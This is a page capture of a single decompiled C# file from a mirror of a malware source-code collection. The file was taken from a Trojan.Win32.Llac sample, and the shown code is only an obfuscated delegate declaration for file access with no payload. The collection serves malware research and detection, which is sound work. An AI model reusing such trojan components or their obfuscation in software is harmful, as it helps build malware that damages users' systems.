mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
17 lines
574 B
C#
17 lines
574 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: Stub, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 18A6455A-DBC9-4D4B-8699-BEBEFCABEF8D
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
internal delegate void \u001E\u0003(
|
|||
|
[In] int obj0,
|
|||
|
[In] string obj1,
|
|||
|
[In] OpenMode obj2,
|
|||
|
[In] OpenAccess obj3,
|
|||
|
[In] OpenShare obj4,
|
|||
|
[In] int obj5);
|